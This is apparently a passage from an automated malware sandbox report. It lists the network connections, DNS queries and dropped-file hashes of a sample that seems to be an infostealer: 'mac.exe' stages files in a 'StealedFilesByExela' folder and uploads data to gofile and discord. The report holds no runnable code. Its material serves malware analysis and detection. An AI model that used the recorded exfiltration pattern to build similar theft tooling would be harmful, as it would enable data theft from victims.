                                                                                      200
                                                                                    • 208.95.112.1:80
                                                                                      http://ip-api.com/json
                                                                                      http
                                                                                      mac.exe
                                                                                      355 B
                                                                                      600 B
                                                                                      5
                                                                                      3

                                                                                      HTTP Request

                                                                                      GET http://ip-api.com/json

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 127.0.0.1:53787
                                                                                      mac.exe
                                                                                    • 127.0.0.1:53794
                                                                                      mac.exe
                                                                                    • 127.0.0.1:53797
                                                                                      mac.exe
                                                                                    • 127.0.0.1:53799
                                                                                      mac.exe
                                                                                    • 162.159.135.232:443
                                                                                      discord.com
                                                                                      tls
                                                                                      mac.exe
                                                                                      2.8kB
                                                                                      5.4kB
                                                                                      12
                                                                                      12
                                                                                    • 162.159.135.232:443
                                                                                      discord.com
                                                                                      tls
                                                                                      mac.exe
                                                                                      1.9kB
                                                                                      5.4kB
                                                                                      11
                                                                                      11
                                                                                    • 45.112.123.126:443
                                                                                      api.gofile.io
                                                                                      tls
                                                                                      mac.exe
                                                                                      1.2kB
                                                                                      5.8kB
                                                                                      10
                                                                                      10
                                                                                    • 45.112.123.227:443
                                                                                      store1.gofile.io
                                                                                      tls
                                                                                      mac.exe
                                                                                      86.4MB
                                                                                      756.9kB
                                                                                      61873
                                                                                      18725
                                                                                    • 162.159.135.232:443
                                                                                      discord.com
                                                                                      tls
                                                                                      mac.exe
                                                                                      2.2kB
                                                                                      4.7kB
                                                                                      11
                                                                                      12
                                                                                    • 45.112.123.126:443
                                                                                      api.gofile.io
                                                                                      tls
                                                                                      mac.exe
                                                                                      1.2kB
                                                                                      5.8kB
                                                                                      10
                                                                                      11
                                                                                    • 45.112.123.227:443
                                                                                      store1.gofile.io
                                                                                      tls
                                                                                      mac.exe
                                                                                      8.7MB
                                                                                      74.3kB
                                                                                      6241
                                                                                      1682
                                                                                    • 127.0.0.1:53999
                                                                                      mac.exe
                                                                                    • 127.0.0.1:54001
                                                                                      mac.exe
                                                                                    • 162.159.135.232:443
                                                                                      discord.com
                                                                                      tls
                                                                                      mac.exe
                                                                                      1.8kB
                                                                                      5.5kB
                                                                                      11
                                                                                      13
                                                                                    • 8.8.8.8:53
                                                                                      8.8.8.8.in-addr.arpa
                                                                                      dns
                                                                                      66 B
                                                                                      90 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      8.8.8.8.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      149.220.183.52.in-addr.arpa
                                                                                      dns
                                                                                      73 B
                                                                                      147 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      149.220.183.52.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      240.221.184.93.in-addr.arpa
                                                                                      dns
                                                                                      73 B
                                                                                      144 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      240.221.184.93.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      0.159.190.20.in-addr.arpa
                                                                                      dns
                                                                                      71 B
                                                                                      157 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      0.159.190.20.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      95.221.229.192.in-addr.arpa
                                                                                      dns
                                                                                      73 B
                                                                                      144 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      95.221.229.192.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      www.dropbox.com
                                                                                      dns
                                                                                      RippleSpoofer.exe
                                                                                      61 B
                                                                                      111 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      www.dropbox.com

                                                                                      DNS Response

                                                                                      162.125.64.18

                                                                                    • 8.8.8.8:53
                                                                                      18.64.125.162.in-addr.arpa
                                                                                      dns
                                                                                      72 B
                                                                                      122 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      18.64.125.162.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      ucbd8a023e00d50d75466db2a13c.dl.dropboxusercontent.com
                                                                                      dns
                                                                                      RippleSpoofer.exe
                                                                                      100 B
                                                                                      161 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      ucbd8a023e00d50d75466db2a13c.dl.dropboxusercontent.com

                                                                                      DNS Response

                                                                                      162.125.64.15

                                                                                    • 8.8.8.8:53
                                                                                      15.64.125.162.in-addr.arpa
                                                                                      dns
                                                                                      72 B
                                                                                      122 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      15.64.125.162.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      13.86.106.20.in-addr.arpa
                                                                                      dns
                                                                                      71 B
                                                                                      157 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      13.86.106.20.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      www.youtube.com
                                                                                      dns
                                                                                      msedge.exe
                                                                                      61 B
                                                                                      335 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      www.youtube.com

                                                                                      DNS Response

                                                                                      142.250.187.206
                                                                                      142.250.178.14
                                                                                      216.58.204.78
                                                                                      142.250.180.14
                                                                                      216.58.212.238
                                                                                      142.250.200.46
                                                                                      172.217.16.238
                                                                                      142.250.200.14
                                                                                      172.217.169.46
                                                                                      216.58.212.206
                                                                                      142.250.187.238
                                                                                      172.217.169.14
                                                                                      172.217.169.78
                                                                                      216.58.201.110
                                                                                      142.250.179.238

                                                                                    • 8.8.8.8:53
                                                                                      consent.youtube.com
                                                                                      dns
                                                                                      msedge.exe
                                                                                      65 B
                                                                                      81 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      consent.youtube.com

                                                                                      DNS Response

                                                                                      142.250.179.238

                                                                                    • 8.8.8.8:53
                                                                                      73.31.126.40.in-addr.arpa
                                                                                      dns
                                                                                      71 B
                                                                                      157 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      73.31.126.40.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      206.187.250.142.in-addr.arpa
                                                                                      dns
                                                                                      74 B
                                                                                      113 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      206.187.250.142.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      238.179.250.142.in-addr.arpa
                                                                                      dns
                                                                                      74 B
                                                                                      113 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      238.179.250.142.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      67.204.58.216.in-addr.arpa
                                                                                      dns
                                                                                      72 B
                                                                                      169 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      67.204.58.216.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      10.180.250.142.in-addr.arpa
                                                                                      dns
                                                                                      73 B
                                                                                      112 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      10.180.250.142.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      99.201.58.216.in-addr.arpa
                                                                                      dns
                                                                                      72 B
                                                                                      169 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      99.201.58.216.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      www.google.com
                                                                                      dns
                                                                                      msedge.exe
                                                                                      60 B
                                                                                      76 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      www.google.com

                                                                                      DNS Response

                                                                                      216.58.201.100

                                                                                    • 8.8.8.8:53
                                                                                      100.201.58.216.in-addr.arpa
                                                                                      dns
                                                                                      73 B
                                                                                      171 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      100.201.58.216.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      200.163.202.172.in-addr.arpa
                                                                                      dns
                                                                                      74 B
                                                                                      160 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      200.163.202.172.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      198.187.3.20.in-addr.arpa
                                                                                      dns
                                                                                      71 B
                                                                                      157 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      198.187.3.20.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      107.12.20.2.in-addr.arpa
                                                                                      dns
                                                                                      70 B
                                                                                      133 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      107.12.20.2.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      storage.bunnycdn.com
                                                                                      dns
                                                                                      RippleSpoofer.exe
                                                                                      66 B
                                                                                      130 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      storage.bunnycdn.com

                                                                                      DNS Response

                                                                                      109.61.89.55
                                                                                      109.61.89.53
                                                                                      185.59.220.194
                                                                                      109.61.89.54

                                                                                    • 8.8.8.8:53
                                                                                      55.89.61.109.in-addr.arpa
                                                                                      dns
                                                                                      71 B
                                                                                      112 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      55.89.61.109.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      ip-api.com
                                                                                      dns
                                                                                      mac.exe
                                                                                      56 B
                                                                                      72 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      ip-api.com

                                                                                      DNS Response

                                                                                      208.95.112.1

                                                                                    • 8.8.8.8:53
                                                                                      1.112.95.208.in-addr.arpa
                                                                                      dns
                                                                                      71 B
                                                                                      95 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      1.112.95.208.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      discord.com
                                                                                      dns
                                                                                      mac.exe
                                                                                      57 B
                                                                                      137 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      discord.com

                                                                                      DNS Response

                                                                                      162.159.135.232
                                                                                      162.159.138.232
                                                                                      162.159.137.232
                                                                                      162.159.128.233
                                                                                      162.159.136.232

                                                                                    • 8.8.8.8:53
                                                                                      232.135.159.162.in-addr.arpa
                                                                                      dns
                                                                                      74 B
                                                                                      136 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      232.135.159.162.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      api.gofile.io
                                                                                      dns
                                                                                      mac.exe
                                                                                      59 B
                                                                                      75 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      api.gofile.io

                                                                                      DNS Response

                                                                                      45.112.123.126

                                                                                    • 8.8.8.8:53
                                                                                      store1.gofile.io
                                                                                      dns
                                                                                      mac.exe
                                                                                      62 B
                                                                                      78 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      store1.gofile.io

                                                                                      DNS Response

                                                                                      45.112.123.227

                                                                                    • 8.8.8.8:53
                                                                                      126.123.112.45.in-addr.arpa
                                                                                      dns
                                                                                      73 B
                                                                                      127 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      126.123.112.45.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      227.123.112.45.in-addr.arpa
                                                                                      dns
                                                                                      73 B
                                                                                      127 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      227.123.112.45.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      81.144.22.2.in-addr.arpa
                                                                                      dns
                                                                                      70 B
                                                                                      133 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      81.144.22.2.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      73.144.22.2.in-addr.arpa
                                                                                      dns
                                                                                      70 B
                                                                                      133 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      73.144.22.2.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      43.229.111.52.in-addr.arpa
                                                                                      dns
                                                                                      72 B
                                                                                      158 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      43.229.111.52.in-addr.arpa

                                                                                    • 224.0.0.251:5353
                                                                                      158 B
                                                                                      2
                                                                                    • 8.8.8.8:53
                                                                                      6.173.189.20.in-addr.arpa
                                                                                      dns
                                                                                      71 B
                                                                                      157 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      6.173.189.20.in-addr.arpa

                                                                                    MITRE ATT&CK Enterprise v15

                                                                                    Replay Monitor

                                                                                    Loading Replay Monitor...

                                                                                    Downloads

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                      Filesize

                                                                                      152B

                                                                                      MD5

                                                                                      36988ca14952e1848e81a959880ea217

                                                                                      SHA1

                                                                                      a0482ef725657760502c2d1a5abe0bb37aebaadb

                                                                                      SHA256

                                                                                      d7e96088b37cec1bde202ae8ec2d2f3c3aafc368b6ebd91b3e2985846facf2e6

                                                                                      SHA512

                                                                                      d04b2f5afec92eb3d9f9cdc148a3eddd1b615e0dfb270566a7969576f50881d1f8572bccb8b9fd7993724bdfe36fc7633a33381d43e0b96c4e9bbd53fc010173

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                      Filesize

                                                                                      152B

                                                                                      MD5

                                                                                      fab8d8d865e33fe195732aa7dcb91c30

                                                                                      SHA1

                                                                                      2637e832f38acc70af3e511f5eba80fbd7461f2c

                                                                                      SHA256

                                                                                      1b034ffe38e534e2b7a21be7c1f207ff84a1d5f3893207d0b4bb1a509b4185ea

                                                                                      SHA512

                                                                                      39a3d43ef7e28fea2cb247a5d09576a4904a43680db8c32139f22a03d80f6ede98708a2452f3f82232b868501340f79c0b3f810f597bcaf5267c3ccfb1704b43

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                      Filesize

                                                                                      240B

                                                                                      MD5

                                                                                      21d02c50446ce7e69e0b61a74e25b2de

                                                                                      SHA1

                                                                                      4e4e79b1951b6cbdd78131e68b61e36ba16045b3

                                                                                      SHA256

                                                                                      a179b27129547de8e47f7e214b6bde5337bca7f3ce91fcf1808013fe3378cf9a

                                                                                      SHA512

                                                                                      a1442d495688c1c2b6e9f430f6c0cac507fbb0401eadda597415417f77fce1d1ef7de8a775740db60ff54b4d862e015bf1a0d4788b71151c56120033eee82973

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      4e9f71aed77abf00c0aa9ba793e8698f

                                                                                      SHA1

                                                                                      89c353b7bcffc846528fa8650b48ede3b3d98b22

                                                                                      SHA256

                                                                                      21af31f98c5fd84f487576757b5e432a154c6334f4553fd954da25435a493f13

                                                                                      SHA512

                                                                                      64d84e6e0d927b069e4b6f4a1565672463fa64112b35a4907dded98bc3ff0c787c135c87c08e1a34ab05289feffc65522da6b159dd28ad3f2512a48ffb18e994

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                      Filesize

                                                                                      5KB

                                                                                      MD5

                                                                                      2d568c1c9f29e2fc403999c56d689179

                                                                                      SHA1

                                                                                      b889dcd78c8ef34b3d0032804bd6afb4271b0df9

                                                                                      SHA256

                                                                                      42dea03636ea9be16830d1a316703701753447c609cf7cb1996d14817318bee3

                                                                                      SHA512

                                                                                      07619c1ae918347029c591ce6c5c3f91ed744b8fd704ccf2dcd3ac6c8fefff0fcdaa04fcaff73b92bff58dafe784a0b4a729c4b43c4b397f94680a42364e7dac

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                      Filesize

                                                                                      6KB

                                                                                      MD5

                                                                                      39fc6ae49a6cdd497571b8e70eaacabd

                                                                                      SHA1

                                                                                      43b6c5ece22f17847e0749be4c6117cb1cddc171

                                                                                      SHA256

                                                                                      f28eb8a4cf353ccfdf04f0f5b3483195fb6a9c2a2e874a80b8de30a1a80d016d

                                                                                      SHA512

                                                                                      81e6d0e28cc17289969cf305b38b1508744070f42423d5898a2a4dc927e34075dab1b6eaf2727e3845fb69fdfbefe1b16a2c45f960b1ee3722d2698413296c0d

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                      Filesize

                                                                                      10KB

                                                                                      MD5

                                                                                      584f7c298e31fd853b1481f5638aec15

                                                                                      SHA1

                                                                                      0349df8f88401df6c3d4a3f25b63e5849f6d2cf4

                                                                                      SHA256

                                                                                      19d66fd3724b96ba23ecafbffbfdaf27a92588cb7e19e2c265a2a26d594881b0

                                                                                      SHA512

                                                                                      534960ce7e91355228a7ef5facd97810af84230befa3b9b06f3115d7467e1a19e64cb7062278fd9479f62a9ab771c26c9b2a6ca02a0e8bf7787bea90364a8878

                                                                                    • C:\Users\Admin\AppData\Local\Temp\DownloadData.db

                                                                                      Filesize

                                                                                      124KB

                                                                                      MD5

                                                                                      b3bcdc1db20a601d23f5e00188d4d7fa

                                                                                      SHA1

                                                                                      d6af8c96e75315f30c07bcb12279cfb706f60129

                                                                                      SHA256

                                                                                      bfec2fbfdb5bd631b56c6c6a6acfb85d92966324cf0596de15eb28be4c36cef2

                                                                                      SHA512

                                                                                      47ae827bfc1d6588c46d745b05af4aa5ae6a1f6dfbece66015af5ad0f1d8e75d52497b1481d1644f84363aecb60b4a67d9aa9c53741d03892f8b64ad3f47ffdc

                                                                                    • C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\BackupMove.mpp

                                                                                      Filesize

                                                                                      522KB

                                                                                      MD5

                                                                                      d62faa0cfdaf9fcaf4955cd6cca496da

                                                                                      SHA1

                                                                                      6d54147959451002d9317dd1019bfdb789cca57c

                                                                                      SHA256

                                                                                      ab9ec82b74107e5d59948d1b1366d099ee537b2461974116e014d263442b1040

                                                                                      SHA512

                                                                                      c94811edee72ffb9f7194ea1aea0ab438f6ed186fe22d486849abcfd5118075edbe249523be89b16edc6c65767b9bb63994a0977f6f0bbe9d1df444423a91232

                                                                                    • C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\RenameRestart.xlsx

                                                                                      Filesize

                                                                                      13KB

                                                                                      MD5

                                                                                      6016bd55ad4cd7aa0a2867ef35bbde02

                                                                                      SHA1

                                                                                      cf1d6557327b2291d3137556a4b843f55a0e50cd

                                                                                      SHA256

                                                                                      8306a2d4d65914537e6fe8f4b7eaa36c2937c345d9a06a4d7027b0db431381e7

                                                                                      SHA512

                                                                                      ff6ac3cf86f5b120e3c41ed814cc2c0689a227721619e569a2d8c83391c72a2fea2b3899f1237e543adae8fd1fa18bf5d64e8695b3a9f43f9301388e971397bb

                                                                                    • C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\RenameSave.xlsx

                                                                                      Filesize

                                                                                      9KB

                                                                                      MD5

                                                                                      e6e51b485d9b419eeadda7caf4fe9456

                                                                                      SHA1

                                                                                      c32f015afb0501ad2231dea86156aa09891e21da

                                                                                      SHA256

                                                                                      fac0e9cd2ab2abe8e4a76ca8124f10f1f3b889ee5f041d826982b4497482faed

                                                                                      SHA512

                                                                                      9932cfa26636845e412b94aad36ddb77948fc08d5149222c2b79b1bfceb5012a7bc3e517bee5624615eacb5554c18d453bfa6dd94cf058bb1c71a24565edb2a7

                                                                                    • C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\RepairHide.docx

                                                                                      Filesize

                                                                                      14KB

                                                                                      MD5

                                                                                      f2ef7d262b2096c644d9a9484f7c76ee

                                                                                      SHA1

                                                                                      0aa95f3aed42423badc4d5f21403e361156ef4fd

                                                                                      SHA256

                                                                                      cb40dfadb4d5bb2e3a47ea0f9dc7b5b120fc2188279a13480ef1617ab61accdf

                                                                                      SHA512

                                                                                      851f4bb84adb9f2d4135428a569fcae3da8ca04d60ae77b76be20f6ab2faa3480b1c61f5e7881384cf13512cf04bc8dbe2ec1501feaefdbe48f7fd7497f471e0

                                                                                    • C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\SendClose.xlsx

                                                                                      Filesize

                                                                                      14KB

                                                                                      MD5

                                                                                      3452fe6e02b630c0cf1086fb6f7f50d0

                                                                                      SHA1

                                                                                      46506d5f7a50663d05c88517a87038a75f38b6d9

                                                                                      SHA256

                                                                                      b8202936dd9bf1668f136a6847c44107f47f821d434233790567113277953d11

                                                                                      SHA512

                                                                                      0f8c54843cab6f9077f4654fb5dd0e49108c0461e71e387debe871b776cab7d2b39ab70aaba1a60d48eb8cb7957ac1d5aaf16a7a2178b1b015452ee97ff568b3

                                                                                    • C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Documents\ReadJoin.doc

                                                                                      Filesize

                                                                                      510KB

                                                                                      MD5

                                                                                      50c0ff348630d3aa7d84b35c94b572ce

                                                                                      SHA1

                                                                                      da50f381efd15254797fe91876d53a772d522ec3

                                                                                      SHA256

                                                                                      0c75280759e016bbbc0550d2038150ba609a6fe7ec5c1b868f1058cf675e1020

                                                                                      SHA512

                                                                                      90e5ddb30aae415565a80b5e2097e563d9e0a857c23eb4634d8cc5d623be0ff37be95ab659d301ed9fed8bcfb9f56b8cb4ccefcf1da576852d7a514055cb6f69

                                                                                    • C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Documents\RequestRevoke.txt

                                                                                      Filesize

                                                                                      315KB

                                                                                      MD5

                                                                                      41fc9a5bffbf03ceec872917b687e45e

                                                                                      SHA1

                                                                                      f756b229264bf4d1d005a03376c1c5e67fc352e2

                                                                                      SHA256

                                                                                      fe1934637947eb88a862649355dcf7a235bfe6cc1889699f07efa41542ba7028

                                                                                      SHA512

                                                                                      4e2099cd0f4ff77ddafefa3676165753df474d2571b26690ba6a1aaa629419e8354d0f96b16d26e9c9c0b514d5ae38d16592279e1acd7f0d7fc32629b400d133

                                                                                    • C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Documents\ShowTest.csv

                                                                                      Filesize

                                                                                      330KB

                                                                                      MD5

                                                                                      87647a208bdd6a339e89ab1c94a763f7

                                                                                      SHA1

                                                                                      7232740ce66ee2cfc90e8f6ba995b729d490e431

                                                                                      SHA256

                                                                                      f202450bf7bed93088c26efb3a6e06bb1d1fd2d25426857a41f91d3a0514a894

                                                                                      SHA512

                                                                                      9012aba8e9dff64dcb0280dee9f767e453205e1a34fe6385af2246cadb34732b762d28d17a0e6330f6902ed8cdda5f1847fd73dcaf791090cbe7815e454ba275

                                                                                    • C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Documents\SkipUnprotect.csv

                                                                                      Filesize

                                                                                      435KB

                                                                                      MD5

                                                                                      642b0f8202e578313736961a5cb038a2

                                                                                      SHA1

                                                                                      f8891dd74424deb48951a994bb0189aad23e97e1

                                                                                      SHA256

                                                                                      49e4d28cbb167ce4c7d82824db05e6dfa8e4fe7bd09832598a7a43f4a5a51825

                                                                                      SHA512

                                                                                      bcb37f5874a8f60e4b979319806f33a8e71e939f6bb1198e3e32c396379341266ae99062639cfd7d4fcf455501eefcc31f7595a2121e380e3fa8d46f12adabad

                                                                                    • C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Documents\UnblockGroup.txt

                                                                                      Filesize

                                                                                      705KB

                                                                                      MD5

                                                                                      36aff477c51f71f5e71e649e35e4e896

                                                                                      SHA1

                                                                                      95e13b10921f5910dfd18740890e16b6f1240f97

                                                                                      SHA256

                                                                                      f0c14f98ef22fff906d05ec275a569b590cee77ad3eadf3f2d5fff5ececef7ea

                                                                                      SHA512

                                                                                      c3d5479c36a8aeb7094402eba990331f2701ca08f75db7a914e025490fed9a2c38ae26efb04bdc44d8103ec8a6dcc0717ab95a4a6d13d22c16e81bca0490fd10

                                                                                    • C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Documents\UnlockSubmit.xlsx

                                                                                      Filesize

                                                                                      555KB

                                                                                      MD5

                                                                                      5ba96cdb69e90d09f2b1dd2ffc26cae6

                                                                                      SHA1

                                                                                      b67fad831c5d375c52fd09dc3b32899652974dbc

                                                                                      SHA256

                                                                                      9177ae8b6290a6d4a3f23e8a4f5a5c67e62bd83fcf203384efa9df8162ce3e25

                                                                                      SHA512

                                                                                      c211888637b658050e40ae98fa5ba18fb07cf002dee474c231fa02c5b6dd483c74ff240e640ca9bc3889aa8bd2517216ef515b1fee909b2d4d8d20f92c4b7b96

                                                                                    • C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Downloads\CompressPing.png

                                                                                      Filesize

                                                                                      399KB

                                                                                      MD5

                                                                                      b0d28baea9928d0cfdc12ff7e9e151a7

                                                                                      SHA1

                                                                                      eaf5126e6a03802861dfdc4c202d4370e96e1be4

                                                                                      SHA256

                                                                                      a7f1a7be2a4c70bc830aecb72811adb46f10ebc600e7ccf4bbddfaa534dec184

                                                                                      SHA512

                                                                                      5806d190cd2009f002dc5fe3a456d0756ec4026f8c39b402b4e1a0186881a1ef66ed2a5610a7a937edeca766e50611724471076a65923a2a4d764ecc82b872cd

                                                                                    • C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Downloads\DebugComplete.xls

                                                                                      Filesize

                                                                                      407KB

                                                                                      MD5

                                                                                      ae48bd76da2b2fb8f6e9a7f58963b405

                                                                                      SHA1

                                                                                      4729b0e56305d767028b51ae45eefdbd01c44756

                                                                                      SHA256

                                                                                      fe2aadc64d427f3e92b898dbfb16094e61f9ff13aa6bfc4de34cef668bbfa759

                                                                                      SHA512

                                                                                      0d2203797a417efcbfbc3c40a7081317d2406f5f1e7a56cdae0d9b0720361633589f47beea176958ace98904f2247e600b66207e6b62b52e6116b0a9abb92fb0

                                                                                    • C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Downloads\ExpandStep.zip

                                                                                      Filesize

                                                                                      185KB

                                                                                      MD5

                                                                                      6bc25cbc22b363e0cfa8f803cae9346c

                                                                                      SHA1

                                                                                      ce121e1d7f3facd452292262c41337f8097aa6b2

                                                                                      SHA256

                                                                                      26871bf3d84c254942a36e82ad7a6c9a3f2788007c83166cf099f6623cd6402b

                                                                                      SHA512

                                                                                      50d8657f0bf6318f4b2df7a384f396d18a3adcc9c6d93c3216ca6a778e7c79dd6109ebee39d624d0a0f821803f658a2b38eb22d1e3fce62228bcc182d816b83d

                                                                                    • C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Downloads\GrantReset.mp4

                                                                                      Filesize

                                                                                      366KB

                                                                                      MD5

                                                                                      46dfe57d8a563cd7fc203b77a568f1b9

                                                                                      SHA1

                                                                                      6dccb3c3b0f29f983c2706921ab09b935009d5c4

                                                                                      SHA256

                                                                                      e6f6947248cd62529a5878b7d8ee64291020a6f9781432ac86f0ba17c725a7a3

                                                                                      SHA512

                                                                                      dfc90183367efb5ece7acc53f6c94a4f1cadf7588dec5da9bbb70e079e1cff15c184aca808cea0d68c491f3fa643b9a5b603401d9a06f9b11ae77fcad4f3785a

                                                                                    • C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Downloads\StartBlock.mp4

                                                                                      Filesize

                                                                                      374KB

                                                                                      MD5

                                                                                      27dfb14f8aa61d03d7a0f48d3ea497f9

                                                                                      SHA1

                                                                                      7b5f98550cfb929d57da68c1c89ca3a2d4137264

                                                                                      SHA256

                                                                                      96b2f7f6329d9c089d9d3f88d1731cf32209d669af927cf6103bf8e00a58c32f

                                                                                      SHA512

                                                                                      ab2f334601dbab5f6c4a342bd45337bf993a9c443ca7b4d646f136c85768abac179fbf122a6957d02196790839fcc832f024a1accec20443ab47b11f27cd7449

                                                                                    • C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Downloads\UndoDeny.txt

                                                                                      Filesize

                                                                                      390KB

                                                                                      MD5

                                                                                      7f8a44ceaad56eed424cdc5059417999

                                                                                      SHA1

                                                                                      4d6fa4124f1b0de5f8d865734befd7995d8df911

                                                                                      SHA256

                                                                                      5310e72699ad1f08499551ba6cdd6691c48b6f7a97702d38f3636a07cf1b2e05

                                                                                      SHA512

                                                                                      d9a6de7850c1c96a9682e0df5bf0527fc3ce1e0af1540b8c07ded2078cb0838642bd9124e04a592c431671f1309435870f6409265ac18a25fad6fbd42a787b95

                                                                                    • C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Downloads\UpdateBackup.vsdm

                                                                                      Filesize

                                                                                      292KB

                                                                                      MD5

                                                                                      8440ce0d44015782bafc926afb9c319a

                                                                                      SHA1

                                                                                      5935899d422413d72665f191214d2c20cacfa8c7

                                                                                      SHA256

                                                                                      7f9f176ec36b17e55330b8a6e45c10f4bf57788e34a472c88217d542ce07945b

                                                                                      SHA512

                                                                                      2a327a74ecbd1674bae5f77eae50f0e583e329a2e764329028fba665b9f4bf3c325279b5a984424bfcefb2c4c1c820f63ecba21296f95f96080617f0c5882e51

                                                                                    • C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Downloads\WatchOut.mp3

                                                                                      Filesize

                                                                                      440KB

                                                                                      MD5

                                                                                      f7154aedc1509a7a4bc9eb1b03d674f0

                                                                                      SHA1

                                                                                      99a3382689925cb70871269c9ec678d3061748a1

                                                                                      SHA256

                                                                                      e8b9c3460a2054b14704c2e1daa94e60b05a7dadf798830e74744429c8706250

                                                                                      SHA512

                                                                                      7aef4b45d99d42a5b01f0ede25fa83a8aba7c68d77a821081c3ba5bd344282e32772c2cd102a0d0c7eb16fe37c7a7652c1d4c27af26d7c5974f8c996abdad5bf

                                                                                    • C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Music\CompleteWrite.txt

                                                                                      Filesize

                                                                                      864KB

                                                                                      MD5

                                                                                      3bf479cccad3e40cfd165bc42d482082

                                                                                      SHA1

                                                                                      9a66e2022b72fec9dccfb9e87bccc2f3ca8840eb

                                                                                      SHA256

